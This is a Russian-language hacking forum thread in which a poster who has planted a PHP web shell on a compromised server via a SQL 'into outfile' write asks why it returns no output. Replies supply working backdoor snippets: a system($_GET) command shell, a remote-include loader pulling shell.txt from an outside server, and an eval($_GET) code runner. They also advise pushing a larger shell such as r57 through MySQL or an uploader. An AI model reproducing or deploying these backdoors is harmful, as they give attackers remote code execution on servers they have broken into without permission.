загрузил шелл через " into outfile " простои типа :
<? system($_GET['c']); ?>
но при виполнения любои команды типа "ls" ничего не случяется и результат никакои ! help !!

Сейф мод ON>?
WinOs>?
include заюзать>?

Сейф мод ON>?
WinOs>?
include заюзать>?


подскажи как ??? проверить Сейф мод ??
include заюзать ???

пиши в РНР файле

if (isset($_GET['shell'])) {
include($_GET['shell'];
}


потом юзай так:

http://site/script.php?shell=http://server/shell.txt


юзай php.net

а если так require_once(ROOT_DIR.'/shell.php');

ставид вот ето : <? if (isset($_GET['shell'])) { include($_GET['shell']; } ?>

получил ето :

Parse error: syntax error, unexpected ';' in /usr/local/apache2/htdocs/cache/information.php on line 1

ставид вот ето :

получил ето :

<? if (isset($_GET['shell'])) { include($_GET['shell']); } ?>
скобочку забыл ... учи пхп

у тя скобки не хватает.
<? if (isset($_GET['shell'])) { include($_GET['shell']); } ?>

а если так require_once(ROOT_DIR.'/shell.php');

это если шелл на серваке который ты взломал уже.

Warning: include() [function.include]: URL file-access is disabled in the server configuration in /usr/local/apache2/htdocs/cache/process.php on line 1

чё делоть ??? ищё может чтото ?

загрузил шелл через " into outfile " простои типа :
<? system($_GET['c']); ?>
но при виполнения любои команды типа "ls" ничего не случяется и результат никакои ! help !!

Ты уверен что он залился???? куда заливал - в /tmp или ты узнал путь от корня и нашел папку с правами на запись? Я склоняюсь к ответу что он просто не залился......

ок но как обеснить ето : при выполнение пустои команды вот рез:
Warning: system() [function.system]: Cannot execute a blank command in /usr/local/apache2/htdocs/cache/version.php on line 1

есль можно по подробнее о том как залить его в /tmp а потом исполизовать !?

у тя скобки не хватает.
<? if (isset($_GET['shell'])) { include($_GET['shell']); } ?>



это если шелл на серваке который ты взломал уже.
ну так ёмаё замени shell на http://site.ru/shell.php и всё

я английский знаю но при выполнение команды ls ничего не показивает !!
как можно стартануть из /tmp шелл ???

Ali_MiX !!! да я всё понял так и зделол и вот каким был результат !!
Warning: include() [function.include]: URL file-access is disabled in the server configuration in /usr/local/apache2/htdocs/cache/process.php on line 1

Ты уверен что он залился???? куда заливал - в /tmp или ты узнал путь от корня и нашел папку с правами на запись? Я склоняюсь к ответу что он просто не залился......
разумеется он залился смотри предыдущий пост
раз урл-инклуд disabled я бы
1)попытался залить шелл через приложения на сервере
2)попробывал бы не через system()

:add сорри забыл страницу обновить, но оба варианта актуальны)

разумеется он залился смотри предыдущий пост
раз урл-инклуд disabled я бы
1)попытался залить шелл через приложения на сервере
2)попробывал бы не через system()

:add сорри забыл страницу обновить, но оба варианта актуальны)

пожалуста по подробнее или силку где почитать можно !

да просто там запрещен инклуд файлов что то такое функция какая то отключена почитай на форуме много таких тем было

подскажи как ??? проверить Сейф мод ??

<?php phpinfo(); ?>

получишь phpinfo() а внём уже найдешь информацию про сейф мод.

или так:

<?php eval($_GET['e']); ?>

http://site/shell.php?e=phpinfo();

Так сможешь выполнять php код.

====================================

у тя скобки не хватает.
<? if (isset($_GET['shell'])) { include($_GET['shell']); } ?>
это если шелл на серваке который ты взломал уже.ну так ёмаё замени shell на http://site.ru/shell.php и всё

Не совсем понял что ты хотел сказать...
Но инклудить вот так: include('http://site/shell.php'); нельзя, т.к. ЭТО во первых будет инклудом удалённого файла, а он у него запрещен (это видно из ошибки), а во вторых проинклудиться в таком случае не сам php код, а результат работы скрипта, а это разные вещи.

====================================

да просто там запрещен инклуд файлов что то такое функция какая то отключена почитай на форуме много таких тем было

Не 'что то такое', а там запрещен инклуд удалённых файлов (т.е. размещенных на другом сайте).

====================================

to TC, если у тебя так плохо с пхп, то тебе будет проще залить через мускул (ты вроде написал что через него заливал) шелл побольше, что нидь с интерфейсом, или к примеру аплодилку файлов (код у неё не большой) и уже так перезалить что нидь типа r57.

P.S. для вопросов есть, вообще то, специальная, прикреплённая тема.
P.P.S. за советы типа Учи английский буду ставить минусы.